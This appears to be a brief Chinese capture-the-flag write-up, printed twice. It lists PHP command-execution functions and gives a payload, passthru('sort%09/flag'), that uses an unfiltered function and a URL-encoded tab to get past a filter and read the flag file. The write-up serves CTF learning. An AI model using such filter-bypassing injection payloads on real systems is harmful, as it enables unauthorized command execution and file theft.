直接对代码进行分析:
命令执行函数
system()
passthru()
exec()
shell_exec()
popen()/proc_open()
passthru没有被过滤,所以直接sys=passthru('sort%09/flag');
得到flag
直接对代码进行分析:
命令执行函数
system()
passthru()
exec()
shell_exec()
popen()/proc_open()
passthru没有被过滤,所以直接sys=passthru('sort%09/flag');
得到flag